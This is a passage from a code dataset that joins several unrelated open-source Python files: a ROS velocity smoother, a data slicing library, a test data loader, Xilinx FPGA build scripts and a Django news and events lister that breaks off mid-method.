while not rospy.is_shutdown():
# AJC: this should probably be a stamped message
data = Float64()
data.data = total / len(vxs)
smooth_publisher.publish(data)
rate.sleep()
if __name__ == '__main__':
# Initialize this node
rospy.init_node('adabot_velocity_smoother')
# Listen to the joint states published by ros_control
rospy.Subscriber('adabot/filtered/odometry', Odometry, odometry_callback)
# Go into the publish loop
try:
publish_smoothed_velocity()
except rospy.ROSInterruptException:
pass
| mit | -1,786,540,024,791,006,700 | 22.032787 | 87 | 0.676868 | false |
interpretml/slicer | slicer/slicer_internal.py | 1 | 20627 | """ Lower level layer for slicer.
Mom's spaghetti.
"""
# TODO: Consider boolean array indexing.
from typing import Any, AnyStr, Union, List, Tuple
from abc import abstractmethod
import numbers
class AtomicSlicer:
""" Wrapping object that will unify slicing across data structures.
What we support:
Basic indexing (return references):
- (start:stop:step) slicing
- support ellipses
Advanced indexing (return references):
- integer array indexing
Numpy Reference:
Basic indexing (return views):
- (start:stop:step) slicing
- support ellipses and newaxis (alias for None)
Advanced indexing (return copy):
- integer array indexing, i.e. X[[1,2], [3,4]]
- boolean array indexing
- mixed array indexing (has integer array, ellipses, newaxis in same slice)
"""
def __init__(self, o: Any, max_dim: Union[None, int, AnyStr] = "auto"):
""" Provides a consistent slicing API to the object provided.
Args:
o: Object to enable consistent slicing.
Currently supports numpy dense arrays, recursive lists ending with list or numpy.
max_dim: Max number of dimensions the wrapped object has.
If set to "auto", max dimensions will be inferred. This comes at compute cost.
"""
self.o = o
self.max_dim = max_dim
if self.max_dim == "auto":
self.max_dim = UnifiedDataHandler.max_dim(o)
def __repr__(self) -> AnyStr:
""" Override default repr for human readability.
Returns:
String to display.
"""
return f"{self.__class__.__name__}({self.o.__repr__()})"
def __getitem__(self, item: Any) -> Any:
""" Consistent slicing into wrapped object.
Args:
item: Slicing key of type integer or slice.
Returns:
Sliced object.
Raises:
ValueError: If slicing is not compatible with wrapped object.
"""
# Turn item into tuple if not already.
index_tup = unify_slice(item, self.max_dim)
# Slice according to object type.
return UnifiedDataHandler.slice(self.o, index_tup, self.max_dim)
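# Illustrative usage sketch (editor's addition, not part of the original module);
# assumes UnifiedDataHandler can handle plain nested lists:
#
#   nested = [[1, 2, 3], [4, 5, 6]]
#   AtomicSlicer(nested)[0, 1:]    # expected -> [2, 3]
#   AtomicSlicer(nested)[..., 2]   # expected -> [3, 6]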
def unify_slice(item: Any, max_dim: int, alias_lookup=None) -> Tuple:
""" Resolves aliases and ellipses in a slice item.
Args:
item: Slicing key that is passed to __getitem__.
max_dim: Max dimension of object to be sliced.
alias_lookup: AliasLookup structure.
Returns:
A tuple representation of the item.
"""
item = _normalize_slice_key(item)
index_tup = _normalize_subkey_types(item)
index_tup = _handle_newaxis_ellipses(index_tup, max_dim)
if alias_lookup:
index_tup = _handle_aliases(index_tup, alias_lookup)
return index_tup
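# Worked example (editor's addition, not in the original source): with max_dim = 3
# and no alias lookup,
#   unify_slice((0, ...), 3) -> (0, slice(None, None, None), slice(None, None, None))
# i.e. the ellipsis is expanded so every dimension gets an explicit subkey.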
def _normalize_subkey_types(index_tup: Tuple) -> Tuple:
""" Casts subkeys into basic types such as int.
Args:
key: Slicing key that is passed within __getitem__.
Returns:
Tuple with subkeys casted to basic types.
"""
new_index_tup = [] # Gets casted to tuple at the end
np_int_types = {
"int8",
"int16",
"int32",
"int64",
"uint8",
"uint16",
"uint32",
"uint64",
}
for subkey in index_tup:
if _safe_isinstance(subkey, "numpy", np_int_types):
new_subkey = int(subkey)
elif _safe_isinstance(subkey, "numpy", "ndarray"):
if len(subkey.shape) == 1:
new_subkey = subkey.tolist()
else:
raise ValueError(f"Cannot use array of shape {subkey.shape} as subkey.")
else:
new_subkey = subkey
new_index_tup.append(new_subkey)
return tuple(new_index_tup)
def _normalize_slice_key(key: Any) -> Tuple:
""" Normalizes slice key into always being a top-level tuple.
Args:
key: Slicing key that is passed within __getitem__.
Returns:
Expanded slice as a tuple.
"""
if not isinstance(key, tuple):
return (key,)
else:
return key
def _handle_newaxis_ellipses(index_tup: Tuple, max_dim: int) -> Tuple:
""" Expands newaxis and ellipses within a slice for simplification.
This code is mostly adapted from: https://github.com/clbarnes/h5py_like/blob/master/h5py_like/shape_utils.py#L111
Args:
index_tup: Slicing key as a tuple.
max_dim: Maximum number of dimensions in the respective sliceable object.
Returns:
Expanded slice as a tuple.
"""
non_indexes = (None, Ellipsis)
concrete_indices = sum(idx not in non_indexes for idx in index_tup)
index_list = []
# newaxis_at = []
has_ellipsis = False
int_count = 0
for item in index_tup:
if isinstance(item, numbers.Number):
int_count += 1
# NOTE: If we need locations of new axis, re-enable this.
if item is None: # pragma: no cover
pass
# newaxis_at.append(len(index_list) + len(newaxis_at) - int_count)
elif item == Ellipsis:
if has_ellipsis: # pragma: no cover
raise IndexError("an index can only have a single ellipsis ('...')")
has_ellipsis = True
initial_len = len(index_list)
while len(index_list) + (concrete_indices - initial_len) < max_dim:
index_list.append(slice(None))
else:
index_list.append(item)
if len(index_list) > max_dim: # pragma: no cover
raise IndexError("too many indices for array")
while len(index_list) < max_dim:
index_list.append(slice(None))
# return index_list, newaxis_at
return tuple(index_list)
def _handle_aliases(index_tup: Tuple, alias_lookup) -> Tuple:
new_index_tup = []
def resolve(item, dim):
if isinstance(item, slice):
return item
# Replace element if in alias lookup, otherwise use original.
item = alias_lookup.get(dim, item, item)
return item
# Go through each element within the index and resolve if needed.
for dim, item in enumerate(index_tup):
if isinstance(item, list):
new_item = []
for sub_item in item:
new_item.append(resolve(sub_item, dim))
else:
new_item = resolve(item, dim)
new_index_tup.append(new_item)
return tuple(new_index_tup)
class Tracked(AtomicSlicer):
""" Tracked defines an object that slicer wraps."""
def __init__(self, o: Any, dim: Union[int, List, tuple, None, str] = "auto"):
""" Defines an object that will be wrapped by slicer.
Args:
o: Object that will be tracked for slicer.
dim: Target dimension(s) slicer will index on for this object.
"""
super().__init__(o)
# Protected attribute that can be overriden.
self._name = None
# Place dim into coordinate form.
if dim == "auto":
self.dim = list(range(self.max_dim))
elif dim is None:
self.dim = []
elif isinstance(dim, int):
self.dim = [dim]
elif isinstance(dim, list):
self.dim = dim
elif isinstance(dim, tuple):
self.dim = list(dim)
else: # pragma: no cover
raise ValueError(f"Cannot handle dim of type: {type(dim)}")
class Obj(Tracked):
""" An object that slicer wraps. """
def __init__(self, o, dim="auto"):
super().__init__(o, dim)
class Alias(Tracked):
""" Defines a tracked object as well as additional __getitem__ keys. """
def __init__(self, o, dim):
if not (
isinstance(dim, int) or (isinstance(dim, (list, tuple)) and len(dim) <= 1)
): # pragma: no cover
raise ValueError("Aliases must track a single dimension")
super().__init__(o, dim)
class AliasLookup:
def __init__(self, aliases):
self._lookup = {}
# Populate lookup and merge indexes.
for _, alias in aliases.items():
self.update(alias)
def update(self, alias):
if alias.dim is None or len(alias.dim) == 0:
return
dim = alias.dim[0]
if dim not in self._lookup:
self._lookup[dim] = {}
dim_lookup = self._lookup[dim]
# NOTE: Alias must be backed by either a list or dictionary.
itr = enumerate(alias.o) if isinstance(alias.o, list) else alias.o.items()
for i, x in itr:
if x not in dim_lookup:
dim_lookup[x] = set()
dim_lookup[x].add(i)
def delete(self, alias):
        """Delete an existing alias from the lookup."""
dim = alias.dim[0]
dim_lookup = self._lookup[dim]
# NOTE: Alias must be backed by either a list or dictionary.
itr = enumerate(alias.o) if isinstance(alias.o, list) else alias.o.items()
for i, x in itr:
del dim_lookup[x]
def get(self, dim, target, default=None):
if dim not in self._lookup:
return default
indexes = self._lookup[dim].get(target, None)
if indexes is None:
return default
if len(indexes) == 1:
return next(iter(indexes))
else:
return list(indexes)
def resolve_dim(slicer_index: Tuple, slicer_dim: List) -> List:
""" Extracts new dim after applying slicing index and maps it back to the original index list. """
new_slicer_dim = []
reduced_mask = []
for _, curr_idx in enumerate(slicer_index):
if isinstance(curr_idx, (tuple, list, slice)):
reduced_mask.append(0)
else:
reduced_mask.append(1)
for curr_dim in slicer_dim:
if reduced_mask[curr_dim] == 0:
new_slicer_dim.append(curr_dim - sum(reduced_mask[:curr_dim]))
return new_slicer_dim
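# Illustrative behaviour (added for clarity): integer indexes collapse a
# dimension and the surviving tracked dims are renumbered, e.g.
#   resolve_dim((0, slice(None)), [0, 1])  # -> [0]  (old dim 1 becomes new dim 0)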
def reduced_o(tracked: Tracked) -> Union[List, Any]:
os = [t.o for t in tracked]
os = os[0] if len(os) == 1 else os
return os
class BaseHandler:
@classmethod
@abstractmethod
def head_slice(cls, o, index_tup, max_dim):
raise NotImplementedError() # pragma: no cover
@classmethod
@abstractmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
raise NotImplementedError() # pragma: no cover
@classmethod
@abstractmethod
def max_dim(cls, o):
raise NotImplementedError() # pragma: no cover
@classmethod
def default_alias(cls, o):
return []
class SeriesHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
is_element = True if isinstance(head_index, int) else False
sliced_o = o.iloc[head_index]
return is_element, sliced_o, 1
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
# NOTE: Series only has one dimension,
# call slicer again to end the recursion.
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
@classmethod
def max_dim(cls, o):
return len(o.shape)
@classmethod
def default_alias(cls, o):
index_alias = Alias(o.index.to_list(), 0)
index_alias._name = "index"
return [index_alias]
class DataFrameHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
# NOTE: At head slice, we know there are two fixed dimensions.
cut_index = index_tup
is_element = True if isinstance(cut_index[-1], int) else False
sliced_o = o.iloc[cut_index]
return is_element, sliced_o, 2
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
# NOTE: Dataframe has fixed dimensions,
# call slicer again to end the recursion.
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
@classmethod
def max_dim(cls, o):
return len(o.shape)
@classmethod
def default_alias(cls, o):
index_alias = Alias(o.index.to_list(), 0)
index_alias._name = "index"
column_alias = Alias(o.columns.to_list(), 1)
column_alias._name = "columns"
return [index_alias, column_alias]
class ArrayHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
# Check if head is string
head_index, tail_index = index_tup[0], index_tup[1:]
cut = 1
for sub_index in tail_index:
if isinstance(sub_index, str) or cut == len(o.shape):
break
cut += 1
# Process native array dimensions
cut_index = index_tup[:cut]
is_element = any([True if isinstance(x, int) else False for x in cut_index])
sliced_o = o[cut_index]
return is_element, sliced_o, cut
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
# NOTE: If we're dealing with a scipy matrix,
# we have to manually flatten it ourselves
# to keep consistent to the rest of slicer's API.
if _safe_isinstance(o, "scipy.sparse.csc", "csc_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.csr", "csr_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.dok", "dok_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
elif _safe_isinstance(o, "scipy.sparse.lil", "lil_matrix"):
return AtomicSlicer(o.toarray().flatten(), max_dim=max_dim)[tail_index]
else:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
inner = [AtomicSlicer(e, max_dim=max_dim)[tail_index] for e in o]
if _safe_isinstance(o, "numpy", "ndarray"):
import numpy
if len(inner) > 0 and hasattr(inner[0], "__len__"):
ragged = not all(len(x) == len(inner[0]) for x in inner)
else:
ragged = False
if ragged:
                    return numpy.array(inner, dtype=object)  # numpy.object is removed in newer numpy; plain object is equivalent
else:
return numpy.array(inner)
elif _safe_isinstance(o, "torch", "Tensor"):
import torch
if len(inner) > 0 and isinstance(inner[0], torch.Tensor):
return torch.stack(inner)
else:
return torch.tensor(inner)
elif _safe_isinstance(o, "scipy.sparse.csc", "csc_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='csc')
return out
elif _safe_isinstance(o, "scipy.sparse.csr", "csr_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='csr')
return out
elif _safe_isinstance(o, "scipy.sparse.dok", "dok_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='dok')
return out
elif _safe_isinstance(o, "scipy.sparse.lil", "lil_matrix"):
from scipy.sparse import vstack
out = vstack(inner, format='lil')
return out
else:
raise ValueError(f"Cannot handle type {type(o)}.") # pragma: no cover
@classmethod
def max_dim(cls, o):
if _safe_isinstance(o, "numpy", "ndarray") and o.dtype == "object":
return max([UnifiedDataHandler.max_dim(x) for x in o], default=-1) + 1
else:
return len(o.shape)
class DictHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
        if isinstance(head_index, (tuple, list)) and len(head_index) == 0:  # empty key selects the whole object
return False, o, 1
if isinstance(head_index, (list, tuple)):
return (
False,
{
sub_index: AtomicSlicer(o, max_dim=max_dim)[sub_index]
for sub_index in head_index
},
1,
)
elif isinstance(head_index, slice):
if head_index == slice(None, None, None):
return False, o, 1
return False, o[head_index], 1
else:
return True, o[head_index], 1
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
return {
k: AtomicSlicer(e, max_dim=max_dim)[tail_index] for k, e in o.items()
}
@classmethod
def max_dim(cls, o):
return max([UnifiedDataHandler.max_dim(x) for x in o.values()], default=-1) + 1
class ListTupleHandler(BaseHandler):
@classmethod
def head_slice(cls, o, index_tup, max_dim):
head_index = index_tup[0]
if isinstance(head_index, (tuple, list)) and len(index_tup) == 0:
return False, o, 1
if isinstance(head_index, (list, tuple)):
if len(head_index) == 0:
return False, o, 1
else:
results = [
AtomicSlicer(o, max_dim=max_dim)[sub_index]
for sub_index in head_index
]
results = tuple(results) if isinstance(o, tuple) else results
return False, results, 1
elif isinstance(head_index, slice):
return False, o[head_index], 1
elif isinstance(head_index, int):
return True, o[head_index], 1
else: # pragma: no cover
raise ValueError(f"Invalid key {head_index} for {o}")
@classmethod
def tail_slice(cls, o, tail_index, max_dim, flatten=True):
if flatten:
return AtomicSlicer(o, max_dim=max_dim)[tail_index]
else:
results = [AtomicSlicer(e, max_dim=max_dim)[tail_index] for e in o]
return tuple(results) if isinstance(o, tuple) else results
@classmethod
def max_dim(cls, o):
return max([UnifiedDataHandler.max_dim(x) for x in o], default=-1) + 1
class UnifiedDataHandler:
""" Registry that maps types to their unified slice calls."""
""" Class attribute that maps type to their unified slice calls."""
type_map = {
("builtins", "list"): ListTupleHandler,
("builtins", "tuple"): ListTupleHandler,
("builtins", "dict"): DictHandler,
("torch", "Tensor"): ArrayHandler,
("numpy", "ndarray"): ArrayHandler,
("scipy.sparse.csc", "csc_matrix"): ArrayHandler,
("scipy.sparse.csr", "csr_matrix"): ArrayHandler,
("scipy.sparse.dok", "dok_matrix"): ArrayHandler,
("scipy.sparse.lil", "lil_matrix"): ArrayHandler,
("pandas.core.frame", "DataFrame"): DataFrameHandler,
("pandas.core.series", "Series"): SeriesHandler,
}
@classmethod
def slice(cls, o, index_tup, max_dim):
# NOTE: Unified handles base cases such as empty tuples, which
# specialized handlers do not.
if isinstance(index_tup, (tuple, list)) and len(index_tup) == 0:
return o
# Slice as delegated by data handler.
o_type = _type_name(o)
head_slice = cls.type_map[o_type].head_slice
tail_slice = cls.type_map[o_type].tail_slice
is_element, sliced_o, cut = head_slice(o, index_tup, max_dim)
out = tail_slice(sliced_o, index_tup[cut:], max_dim - cut, is_element)
return out
@classmethod
def max_dim(cls, o):
o_type = _type_name(o)
if o_type not in cls.type_map:
return 0
return cls.type_map[o_type].max_dim(o)
@classmethod
def default_alias(cls, o):
o_type = _type_name(o)
if o_type not in cls.type_map:
return {}
return cls.type_map[o_type].default_alias(o)
def _type_name(o: object) -> Tuple[str, str]:
return o.__class__.__module__, o.__class__.__name__
def _safe_isinstance(
o: object, module_name: str, type_name: Union[str, set, tuple]
) -> bool:
o_module, o_type = _type_name(o)
if isinstance(type_name, str):
return o_module == module_name and o_type == type_name
else:
return o_module == module_name and o_type in type_name
| mit | -3,487,946,828,939,720,700 | 32.377023 | 117 | 0.573132 | false |
ssato/python-anyconfig | tests/base/utils.py | 1 | 3492 | #
# Copyright (C) 2021 Satoru SATOH <[email protected]>
# License: MIT
#
"""File based test data collector.
"""
import ast
import importlib.util
import json
import pathlib
import typing
import warnings
from .datatypes import (
DictT, MaybePathT, TDataPaths
)
def target_by_parent(self: str = __file__):
"""
>>> target_by_parent()
'base'
"""
return pathlib.Path(self).parent.name
def load_from_py(py_path: typing.Union[str, pathlib.Path],
data_name: str = 'DATA') -> DictT:
""".. note:: It's not safe always.
"""
spec = importlib.util.spec_from_file_location('testmod', py_path)
mod = spec.loader.load_module()
return getattr(mod, data_name, None)
def load_literal_data_from_py(py_path: typing.Union[str, pathlib.Path]
) -> DictT:
""".. note:: It might be safer than the above function.
"""
return ast.literal_eval(pathlib.Path(py_path).read_text().strip())
def maybe_data_path(datadir: pathlib.Path, name: str,
should_exist: typing.Iterable[str] = (),
file_ext: str = '*'
) -> typing.Optional[pathlib.Path]:
"""
Get and return the file path of extra data file. Its filename will be
computed from the filename of the base data file given.
"""
pattern = f'{name}.{file_ext}'
if datadir.exists() and datadir.is_dir():
paths = sorted(datadir.glob(pattern))
if paths:
return paths[0] # There should be just one file found.
if datadir.name in should_exist:
raise OSError(f'{datadir!s}/{pattern} should exists but not')
return None
def load_data(path: MaybePathT,
default: typing.Optional[typing.Any] = None,
should_exist: bool = False,
exec_py: bool = False
) -> typing.Union[DictT, str]:
"""
Return data loaded from given path or the default value.
"""
if path is None and not should_exist:
return default
if path.exists():
if path.suffix == '.json':
return json.load(path.open())
if path.suffix == '.py':
return (
load_from_py if exec_py else load_literal_data_from_py
)(path)
if path.suffix == '.txt':
return path.read_text()
return path
raise ValueError(f'Not exist or an invalid data: {path!s}')
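# Illustrative usage (hypothetical paths, added for clarity):
#   load_data(None, default={})                      # -> {}
#   load_data(pathlib.Path("a.json"))                # -> parsed JSON (file must exist)
#   load_data(pathlib.Path("a.py"), exec_py=True)    # -> the module-level DATA constant
#   load_data(pathlib.Path("a.txt"))                 # -> file contents as str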
def each_data_from_dir(datadir: pathlib.Path, pattern: str = '*.json',
should_exist: typing.Iterable[str] = ()
) -> typing.Iterator[TDataPaths]:
"""
Yield a collection of paths of data files under given dir.
"""
if not datadir.is_dir():
raise ValueError(f'Not look a data dir: {datadir!s}')
for inp in sorted(datadir.glob(pattern)):
if not inp.exists():
warnings.warn(f'Not exists: {inp!s}')
continue
if not inp.is_file():
warnings.warn(f'Not looks a file: {inp!s}')
continue
name = inp.stem
yield TDataPaths(
datadir,
inp,
maybe_data_path(datadir / 'e', name, should_exist),
maybe_data_path(datadir / 'o', name, should_exist),
maybe_data_path(datadir / 's', name, should_exist),
maybe_data_path(datadir / 'q', name, should_exist),
maybe_data_path(datadir / 'c', name, should_exist)
)
# vim:sw=4:ts=4:et:
| mit | -5,399,448,639,285,853,000 | 27.859504 | 73 | 0.570447 | false |
dawsonjon/Chips-Demo | demo/build_tools.py | 1 | 7582 | #!/usr/bin/env python
"""compile, build and download the ATLYS demo to the ATLYS development kit"""
import sys
import os
import shutil
from user_settings import ise, vivado
def build_ise(chip, bsp, working_directory):
"""Build using Xilinx ISE an FPGA using the specified BSP
chip is a chip instance.
bsp specifies a directory that must contain:
bsp.py - A python module defining:
chip - a model of the target hardware
buildoptions - the target part
buildtool - the target part
downloadoptions - the target part
downloadtool - the target part
bsp.prj - A partial xilinx prj file containing bsp source files
bsp.ucf - A constraints file containing the user constraints
*.v - verilog source files
*.vhd - vhdl source files
xst_mixed.opt - synthesis options
balanced.opt - place and route options
bitgen.opt - bitgen options
"""
source_files = [i + ".v" for i in chip.components]
source_files += [chip.name + ".v"]
source_files += ["chips_lib.v"]
#Create a project area
#
bsp_dir = os.path.dirname(bsp.__file__)
if not os.path.exists(working_directory):
os.mkdir(working_directory)
current_directory = os.getcwd()
shutil.copyfile(os.path.join(bsp_dir, "bsp.ucf"), os.path.join(working_directory, "bsp.ucf"))
shutil.copyfile(os.path.join(bsp_dir, "xst_mixed.opt"), os.path.join(working_directory, "xst_mixed.opt"))
shutil.copyfile(os.path.join(bsp_dir, "balanced.opt"), os.path.join(working_directory, "balanced.opt"))
shutil.copyfile(os.path.join(bsp_dir, "bitgen.opt"), os.path.join(working_directory, "bitgen.opt"))
#create a comprehensive file list
#
#first add the source files
print "Creating ISE project ..."
prj_file = open(os.path.join(working_directory, "bsp.prj"), 'w')
for path in source_files:
print "Adding file ...", path
_, filename = os.path.split(path)
if filename.upper().endswith(".V"):
prj_file.write("verilog work " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("vhdl work " + filename + "\n")
#then add the bsp files
bsp_files = open(os.path.join(bsp_dir, "bsp.prj")).read().splitlines()
for filename in bsp_files:
print "Adding file ...", filename
from_file = os.path.join(bsp_dir, filename)
filename = os.path.split(from_file)[1]
to_file = os.path.join(working_directory, filename)
shutil.copyfile(from_file, to_file)
if filename.upper().endswith(".V"):
prj_file.write("verilog work " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("vhdl work " + filename + "\n")
prj_file.close()
#run the xilinx build
#
os.chdir(working_directory)
print "Building Demo using Xilinx ise ...."
retval = os.system("%s/xflow -synth xst_mixed.opt -p %s -implement balanced.opt -config bitgen.opt bsp"%(ise, bsp.device))
if retval != 0:
sys.exit(-1)
os.chdir(current_directory)
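# Illustrative call (names below are placeholders, not part of this module):
#   from my_design import my_chip        # a Chips chip instance
#   import atlys_bsp as bsp              # a BSP package laid out as described above
#   build_ise(my_chip, bsp, "ise_build")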
def build_vivado(chip, bsp, working_directory):
"""Build using Xilinx Vivado an FPGA using the specified BSP
chip is a chip instance.
bsp specifies a directory that must contain:
bsp.py - A python module defining:
chip - a model of the target hardware
device - the target part
buildtool - the appriopriate build tool
downloadoptions - the target part
bsp.prj - A partial xilinx prj file containing bsp source files
bsp.xdc - A constraints file containing the user constraints
*.v - verilog source files
*.vhd - vhdl source files
"""
source_files = [i + ".v" for i in chip.components]
source_files += [chip.name + ".v"]
source_files += ["chips_lib.v"]
#Create a project area
#
bsp_dir = os.path.dirname(bsp.__file__)
if not os.path.exists(working_directory):
os.makedirs(working_directory)
current_directory = os.getcwd()
from_file = os.path.join(bsp_dir, "bsp.xdc")
to_file = os.path.join(working_directory, "bsp.xdc")
shutil.copyfile(from_file, to_file)
#create a comprehensive file list
#
#first add the source files
print "Creating Vivado project ..."
prj_file = open(os.path.join(working_directory, "bsp.tcl"), 'w')
prj_file.write(
"""# STEP#1: define the output directory area.
#
set outputDir .
# STEP#2: setup design sources and constraints
#
read_xdc ./bsp.xdc
""")
#first add the source files
for path in source_files:
print "Adding file ...", path
_, filename = os.path.split(path)
if filename.upper().endswith(".V"):
prj_file.write("read_verilog " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("read_vhdl " + filename + "\n")
#then add the bsp files
bsp_files = open(os.path.join(bsp_dir, "bsp.prj")).read().splitlines()
for filename in bsp_files:
print "Adding file ...", filename
from_file = os.path.join(bsp_dir, filename)
filename = os.path.split(from_file)[1]
to_file = os.path.join(working_directory, os.path.split(from_file)[1])
shutil.copyfile(from_file, to_file)
if filename.upper().endswith(".V"):
prj_file.write("read_verilog " + filename + "\n")
elif filename.upper().endswith(".VHD") or filename.upper().endswith(".VHDL"):
prj_file.write("read_vhdl " + filename + "\n")
prj_file.write(
"""
#
# STEP#3: run synthesis, write design checkpoint, report timing,
# and utilization estimates
#
synth_design -top bsp -part %s
write_checkpoint -force $outputDir/post_synth.dcp
report_timing_summary -file $outputDir/post_synth_timing_summary.rpt
report_utilization -file $outputDir/post_synth_util.rpt
# STEP#4: run logic optimization, placement and physical logic optimization,
# write design checkpoint, report utilization and timing estimates
#
opt_design
place_design
report_clock_utilization -file $outputDir/clock_util.rpt
#
phys_opt_design
write_checkpoint -force $outputDir/post_place.dcp
report_utilization -file $outputDir/post_place_util.rpt
report_timing_summary -file $outputDir/post_place_timing_summary.rpt
#
# STEP#5: run the router, write the post-route design checkpoint, report the routing
# status, report timing, power, and DRC, and finally save the Verilog netlist.
#
route_design
write_checkpoint -force $outputDir/post_route.dcp
report_route_status -file $outputDir/post_route_status.rpt
report_timing_summary -file $outputDir/post_route_timing_summary.rpt
report_power -file $outputDir/post_route_power.rpt
report_drc -file $outputDir/post_imp_drc.rpt
write_verilog -force $outputDir/cpu_impl_netlist.v -mode timesim -sdf_anno true
#
# STEP#6: generate a bitstream
#
write_bitstream -force $outputDir/bsp.bit
""" % bsp.device)
prj_file.close()
#run the xilinx build
#
os.chdir(working_directory)
print "Building Demo using Xilinx ise ...."
retval = os.system("%s/vivado -mode batch -source bsp.tcl"%vivado)
if retval != 0:
sys.exit(-1)
os.chdir(current_directory)
| mit | 4,379,624,543,296,484,400 | 35.805825 | 126 | 0.639409 | false |
evildmp/Arkestra | news_and_events/lister.py | 1 | 13293 | import operator
from datetime import datetime, timedelta
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from arkestra_utilities.generic_lister import (
ArkestraGenericLister, ArkestraGenericList, ArkestraGenericFilterSet,
ArkestraGenericPluginLister
)
from arkestra_utilities.settings import (
NEWS_AND_EVENTS_LAYOUT, LISTER_MAIN_PAGE_LIST_LENGTH,
AGE_AT_WHICH_ITEMS_EXPIRE, MULTIPLE_ENTITY_MODE
)
from .models import NewsArticle, Event
import menu
class NewsList(ArkestraGenericList):
model = NewsArticle
heading_text = _(u"News")
def remove_expired(self):
# remove expired
if AGE_AT_WHICH_ITEMS_EXPIRE:
expiry_date = datetime.now() - \
timedelta(days=AGE_AT_WHICH_ITEMS_EXPIRE)
self.items = self.items.filter(date__gte=expiry_date)
def other_items(self):
# supply a list of links to available other items
other_items = []
if "archive" in self.other_item_kinds:
other_items.append({
"link": self.entity.get_auto_page_url("news-archive"),
"title": "News archive",
"count": self.archived_items.count(),
})
if "main" in self.other_item_kinds:
auto_page_title = menu.menu_dict["title_attribute"]
if not MULTIPLE_ENTITY_MODE:
title = getattr(self.entity, auto_page_title)
else:
title = "%s %s" % (
self.entity.short_name,
getattr(self.entity, auto_page_title).lower()
)
other_items.append({
"link": self.entity.get_auto_page_url("news-and-events"),
"title": title,
"css_class": "main"
})
return other_items
def re_order_by_importance(self):
# re-order by importance as well as date
if self.order_by == "importance/date":
ordinary_items = []
# split the within-date items for this entity into two sets
sticky_items = self.items.order_by('-importance').filter(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
sticky_until__gte=datetime.today(),
)
non_sticky_items = self.items.exclude(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
sticky_until__gte=datetime.today(),
)
top_items = list(sticky_items)
# now go through the non-top items, and find any that can be
# promoted
# get the set of dates where possible promotable items can be found
dates = non_sticky_items.dates('date', 'day').reverse()
for date in dates:
# get all non-top items from this date
possible_top_items = non_sticky_items.filter(
date__year=date.year,
date__month=date.month,
date__day=date.day
)
# promotable items have importance > 0
# add the promotable ones to the top items list
top_items.extend(possible_top_items.filter(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
importance__gte=1)
)
# if this date set contains any unimportant items, then
# there are no more to promote
demotable_items = possible_top_items.exclude(
Q(hosted_by=self.entity) | Q(is_sticky_everywhere=True),
importance__gte=1
)
if demotable_items.count() > 0:
# put those unimportant items into ordinary items
ordinary_items.extend(demotable_items)
# and stop looking for any more
break
# and add everything left in non-sticky items before this date
if dates:
remaining_items = non_sticky_items.filter(date__lte=date)
ordinary_items.extend(remaining_items)
for item in top_items:
item.sticky = True
if self.item_format == "title":
item.importance = None
ordinary_items.sort(
key=operator.attrgetter('date'),
reverse=True
)
self.items = top_items + ordinary_items
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.archived_items = self.items
self.remove_expired()
self.re_order_by_importance()
self.truncate_items()
self.set_show_when()
class NewsListCurrent(NewsList):
other_item_kinds = ("archive")
class NewsListPlugin(NewsList):
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.remove_expired()
self.re_order_by_importance() # expensive; shame it has to be here
self.truncate_items()
self.set_show_when()
class NewsListForPerson(NewsList):
def build(self):
self.items = self.model.objects.listable_objects()
        self.set_items_for_person()
self.re_order_by_importance() # expensive; shame it has to be here
self.set_show_when()
class NewsArkestraGenericFilterSet(ArkestraGenericFilterSet):
fields = ['date']
class NewsListArchive(NewsList):
other_item_kinds = ("main")
filter_set = NewsArkestraGenericFilterSet
search_fields = [
{
"field_name": "text",
"field_label": "Search title/summary",
"placeholder": "Search",
"search_keys": [
"title__icontains",
"summary__icontains",
],
},
]
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.filter_on_search_terms()
self.itemfilter = self.filter_set(self.items, self.request.GET)
class EventsList(ArkestraGenericList):
model = Event
heading_text = _(u"Events")
item_collections = (
"actual_events",
"forthcoming_events",
"previous_events"
)
item_template = "news_and_events/event_list_item.html"
def build(self):
self.items = self.model.objects.listable_objects()
self.set_items_for_entity()
self.create_item_collections()
self.truncate_items()
self.set_show_when()
def create_item_collections(self):
if any(
kind in self.item_collections
for kind in (
"actual_events",
"forthcoming_events",
"previous_events"
)):
self.actual_events = self.items.filter(
# an actual event is one that:
# (either has no parent or whose parent is a series) and
# is not a series itself
Q(parent=None) | Q(parent__series=True),
series=False,
).order_by('date', 'start_time')
# (event starting after today) or (not a single-day
# event and ends after today)
